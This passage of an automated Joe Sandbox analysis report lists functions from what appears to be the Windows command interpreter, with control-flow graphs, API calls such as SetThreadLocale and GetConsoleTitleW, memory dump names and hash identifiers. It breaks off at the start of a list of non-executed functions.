                                                                                                                                                                                                                          control_flow_graph 683 19e2af-19e2ba 684 19e2ca-19e2d2 683->684 685 19e2bc-19e2c9 SetThreadUILanguage 683->685 686 19e2ef-19e2f1 684->686 687 19e2d4-19e2ed GetModuleHandleW 684->687 689 19e307-19e309 686->689 690 19e2f3-19e301 GetProcAddress 686->690 687->686 687->689 689->685 691 19e30b-1adc0f SetThreadLocale 689->691 690->689
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadUILanguage.KERNELBASE ref: 0019E2C6
                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,0019B952), ref: 0019E2D9
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(76F70000,SetThreadUILanguage,00000000,0019B952), ref: 0019E2F9
                                                                                                                                                                                                                          • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,0019B952), ref: 001ADC08
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                                                                                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                          • API String ID: 1264603166-2530943252
                                                                                                                                                                                                                          • Opcode ID: 7b7a956f3cfa34f6c781071c06de6c7da2f18d5e2a119f24450481730f6285a1
                                                                                                                                                                                                                          • Instruction ID: 046c2bd6bcb6016019343e37a1c46bb23c83a1c0ef8006a4e4cce95fdd4fe7a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7a956f3cfa34f6c781071c06de6c7da2f18d5e2a119f24450481730f6285a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F05E31A02720ABCE10EB74FD0DA993B94FB15B31B590756F815E3AE0C7749C818AA1
                                                                                                                                                                                                                          Function 0019AD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 693 19ad60-19adc0 GetConsoleTitleW 694 1acc60 693->694 695 19adc6-19add8 call 1a5a2e 693->695 697 1acc6a-1acc73 GetLastError 694->697 700 1acc3f 695->700 701 19adde-19adf1 call 19e3f0 695->701 699 1acc4d call 1978e4 697->699 704 1acc52 699->704 706 1acc49-1acc4b 700->706 707 1acc55-1acc5b call 1a61e6 701->707 708 19adf7-19adff 701->708 704->707 706->699 707->694 710 19b0b9-19b0c3 call 1a0b12 708->710 711 19ae05-19ae1d call 19e950 708->711 710->706 716 19b0c9-19b0d6 call 197f47 710->716 717 19b118-19b11f call 1a21ee 711->717 718 19ae23-19ae26 711->718 716->697 726 19b0dc-19b0f9 towupper 716->726 734 19b126-19b12b call 1a2940 717->734 718->707 720 19ae2c-19ae3e 718->720 723 1acc7c-1acc87 call 1a61e6 720->723 724 19ae44-19ae4c 720->724 727 1acc8e 723->727 724->727 728 19ae52-19ae62 724->728 730 19b100-19b109 726->730 732 1acc99 727->732 731 19ae68-19ae76 728->731 728->732 730->730 735 19b10b-19b112 730->735 736 19ae7c-19ae8b call 19bc30 731->736 737 1acca4 731->737 732->737 745 19afc9-19b005 call 19b17b call 1a61e6 call 1a6b30 734->745 735->717 739 1acc75-1acc77 call 1b9a7d 735->739 747 19ae91-19ae94 736->747 748 19b006-19b008 736->748 742 1accaf 737->742 739->723 750 1accb7-1accb9 742->750 752 19aea9-19aeab 747->752 753 19ae96-19aea3 call 19a800 747->753 748->747 751 19b00e-19b021 wcsncmp 748->751 755 19af2d-19af36 750->755 756 1accbf-1accc4 750->756 751->752 757 19b027 751->757 759 19af71-19af7a call 19b1b0 752->759 760 19aeb1-19aeb5 752->760 753->707 753->752 765 19af3c-19af3e 755->765 766 19b130-19b135 755->766 756->755 757->747 776 19af7c-19af7e call 19ad26 759->776 777 19af83-19af97 759->777 761 19af6b 760->761 762 19aebb-19aebd 760->762 761->759 769 19aec0-19aec9 762->769 772 19b16c-19b170 765->772 773 19af44-19af49 765->773 766->765 768 19b13b-19b145 call 1a0b12 766->768 789 19b198-19b19c 768->789 790 19b147-19b14e 768->790 769->769 775 19aecb-19aedd wcschr 769->775 772->773 779 19b176-1accd6 772->779 780 19af50-19af59 773->780 782 19b033-19b043 775->782 783 19aee3-19aee8 775->783 776->777 785 19af99-19af9f 777->785 786 19afc4 call 19aa50 777->786 794 1accdb-1accea call 1978e4 779->794 780->780 788 19af5b-19af65 780->788 795 19b046-19b04f 782->795 783->750 791 19aeee-19aef4 783->791 792 19b02c-19b031 call 19c6c0 785->792 793 19afa5-19afab 785->793 786->745 788->760 788->761 789->794 797 19b160-19b167 790->797 798 19b150-19b15a call 197f47 790->798 791->750 799 19aefa-19af03 791->799 792->745 800 19b098-19b09d call 199dc0 793->800 801 19afb1-19afb7 793->801 794->704 795->795 804 19b051-19b05b 795->804 797->765 798->797 825 1accc9-1accd2 GetLastError 798->825 806 19af05-19af0a 799->806 800->745 808 19afbd-19afc2 call 199770 801->808 809 19b0a2-19b0a8 801->809 812 19b05d 804->812 813 19b077-19b07f 804->813 818 19af0c-19af13 806->818 819 19af20-19af22 806->819 808->745 809->734 821 19b0aa-19b0b2 call 1959a0 809->821 814 19b060-19b067 812->814 815 19b193 call 1a6c78 813->815 816 19b085-19b08e 813->816 823 19b069-19b071 814->823 824 19b072-19b075 814->824 815->789 816->800 818->819 826 19af15-19af1e 818->826 819->742 827 19af28-19af2a 819->827 831 19b0b4 821->831 823->824 824->813 824->814 825->794 826->806 826->819 827->755 831->745
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,00000104,91B40133,00000001,?), ref: 0019ADB6
                                                                                                                                                                                                                            • Part of subcall function 001A5A2E: memset.MSVCRT ref: 001A5A5A
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 0019B0E3
                                                                                                                                                                                                                            • Part of subcall function 0019E950: memset.MSVCRT ref: 0019E9A0
                                                                                                                                                                                                                            • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019E9FC
                                                                                                                                                                                                                            • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019EA14
                                                                                                                                                                                                                            • Part of subcall function 0019E950: _wcsicmp.MSVCRT ref: 0019EA80
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019AED2
                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 0019B016
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 001ACC6C
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001ACCCB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4198873954-0
                                                                                                                                                                                                                          • Opcode ID: 497a7c315daf09ccc951c6097160109167f328f22bf097ddd374952f78312e94
                                                                                                                                                                                                                          • Instruction ID: 31af84877a138813a551ad1bb472e597bbf721a9a0e3423d00341734fcc1bada
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497a7c315daf09ccc951c6097160109167f328f22bf097ddd374952f78312e94
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10B18875A042118BCF28AF28DD957BE73B0EF51700F550169E90B976D1EB309D89C7D2
                                                                                                                                                                                                                          Function 001A1F1A Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 862 1a1f1a-1a1f33 GetConsoleOutputCP GetCPInfo 863 1a1f39-1a1f54 memset 862->863 864 1af185-1af194 GetThreadLocale 862->864 865 1a1f5a 863->865 866 1af1d7-1af1d8 863->866 867 1af1ae-1af1b2 864->867 868 1af196-1af1a0 864->868 871 1af1dd-1af1e2 866->871 869 1af1c8 867->869 870 1af1b4-1af1b8 867->870 868->867 869->866 870->869 874 1af1ba 870->874 872 1af20b-1af20c 871->872 873 1af1e4-1af1ec 871->873 875 1af1ee-1af200 memset 873->875 876 1af203-1af209 873->876 874->869 875->876 876->871 876->872
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(001A0A41), ref: 001A1F1A
                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A1F2B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A1F45
                                                                                                                                                                                                                          • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 001AF185
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001AF1FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263632223-0
                                                                                                                                                                                                                          • Opcode ID: d477916382639a5416bef4dfbc5e619b4f42100b2099827703cf7c0e4581666b
                                                                                                                                                                                                                          • Instruction ID: 4e63d5b374e820056d71233fc28c3a42763676fdaebd3f112820bef08816ebf3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d477916382639a5416bef4dfbc5e619b4f42100b2099827703cf7c0e4581666b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 351148B9809353ADDB345B54DC0AF793B94AB12304F44013FE4AA665D4D7B4CDC78299
                                                                                                                                                                                                                          Function 0019A9D4 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0019A9C5), ref: 0019A9D8
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0019A9F3
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0019A9FA
                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0019AA09
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0019AA12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 429350006-0
                                                                                                                                                                                                                          • Opcode ID: 2faf65c55c9b4f8ac02107ccd48ebfa9da031b898c98590148e1eb0a1dd4c765
                                                                                                                                                                                                                          • Instruction ID: 9d5e1a3b2c205bfe490934f6e921535dbbe0dfad5b38227b6c44ce4ccbdf8c76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2faf65c55c9b4f8ac02107ccd48ebfa9da031b898c98590148e1eb0a1dd4c765
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EE0927760312027C611772A2C88C6F6B5DEFC56A1B850011F809D3201DF248C4686F3
                                                                                                                                                                                                                          Function 0019E3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 884 19e3f0-19e403 885 19e45d 884->885 886 19e405-19e41d call 1a6e25 884->886 887 19e45f-19e463 885->887 889 19e422-19e427 886->889 890 1adc4a-1adc66 call 1b34d4 889->890 891 19e42d-19e43b 889->891 890->887 892 1adc6b-1adc72 ??_V@YAXPAX@Z 891->892 893 19e441-19e44f 891->893 895 19e451-19e45a memset 893->895 896 19e466-19e468 893->896 895->885 896->895
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00195F21,-00000001), ref: 001ADC6C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 001ADC57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                          • Opcode ID: 7bfe36efaeccf7a2ba0280ab28be626f05e2a0ea0308dd66326b11f03785dd6c
                                                                                                                                                                                                                          • Instruction ID: 630cd7c3a11c0bc09451b0b19fbf918f8fc588e65bc24f0b4980d441bd356428
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bfe36efaeccf7a2ba0280ab28be626f05e2a0ea0308dd66326b11f03785dd6c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 950124B1700304ABDB28C624EC0AB67B2C9DBD1710F14452EF92AD7281EFB2FD4082A1
                                                                                                                                                                                                                          Function 001A742D Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _callnewh.MSVCRT ref: 001A7437
                                                                                                                                                                                                                            • Part of subcall function 001A74D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(001A77EC,00000001), ref: 001A74E7
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 001A7444
                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT(?,001BCBF8), ref: 001A77F5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 813871643-0
                                                                                                                                                                                                                          • Opcode ID: 06b53c4dddc01ae71c4dff5008d5d753812dea5606e941cb7f0c9cea190684e5
                                                                                                                                                                                                                          • Instruction ID: 3bc7a04cc7c1e365db6969204e5025ffa7a1af1ff6ceba85e576d7c1d54a2462
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06b53c4dddc01ae71c4dff5008d5d753812dea5606e941cb7f0c9cea190684e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E0DF3E40820EBBCF1476A5EC0A8AE3F2C8B47330B648060B819968D2EF71DB46C5D1
                                                                                                                                                                                                                          Function 00195EA3 Relevance: 3.3, APIs: 2, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00195EFB
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                            • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                            • Part of subcall function 001A0060: wcschr.MSVCRT ref: 001A006C
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00195FF7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4234405029-0
                                                                                                                                                                                                                          • Opcode ID: d912f4c437d4b8046a1cacf8dacdabc1af9790c489d72d73a11dd6570949719a
                                                                                                                                                                                                                          • Instruction ID: 5b62672d7526b8a453519e13579a668c60241f3b2026f59ecc6ef4fccb6e5017
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d912f4c437d4b8046a1cacf8dacdabc1af9790c489d72d73a11dd6570949719a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EA1BE756083419BDB18DB24C849A7FBBE5EFC5314F14882EF88AC7291EB74C985CB52
                                                                                                                                                                                                                          Function 0019E470 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: COMSPEC
                                                                                                                                                                                                                          • API String ID: 2221118986-1631433037
                                                                                                                                                                                                                          • Opcode ID: e75f7415c0613ccfe85c25045d00ba38541598421f215a00359dcdc79abc7366
                                                                                                                                                                                                                          • Instruction ID: 8ac80a6a7da569dd238aa6116b8d2dab0e2aea7175b8b0591d09854617ef0183
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e75f7415c0613ccfe85c25045d00ba38541598421f215a00359dcdc79abc7366
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541E5747042008BEF39EB28D55973E76D5AFA5708F16092AE845C7291FB71EC8486D3
                                                                                                                                                                                                                          Function 001A6E30 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 001A6E37
                                                                                                                                                                                                                            • Part of subcall function 001A742D: malloc.MSVCRT ref: 001A7444
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: H_prolog3_catchmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 125873668-0
                                                                                                                                                                                                                          • Opcode ID: 2ed3fd6bc75b48eae2c8fa3f76f7c31aae2a6118de017ecb80981c3937d4522c
                                                                                                                                                                                                                          • Instruction ID: 47dee44adcd0e22a33933bce60e9faa3e1f2242d01b1bf7c0aea6fb1d4aa4c3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ed3fd6bc75b48eae2c8fa3f76f7c31aae2a6118de017ecb80981c3937d4522c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26C04C2D529644D6DB4577A4E90275C2A10AB63B52F908045B144290C5EF7547546A91
                                                                                                                                                                                                                          Function 001A1A05 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                          • Opcode ID: 1b50dbbf4eee2f93aa091ce79aa077404ae0a82599011c4079c7ca7b6e794edb
                                                                                                                                                                                                                          • Instruction ID: 1165cb8460be5610eee4c740fe072f213e04565bdbdfd92a35b250e5adbc872d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b50dbbf4eee2f93aa091ce79aa077404ae0a82599011c4079c7ca7b6e794edb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E0DF7B74A2613FE22C14A86C87A278A99CBD2B60F290036F6049B180EBA04D0402A4

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 001B4191 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 001B41B9
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B41CA
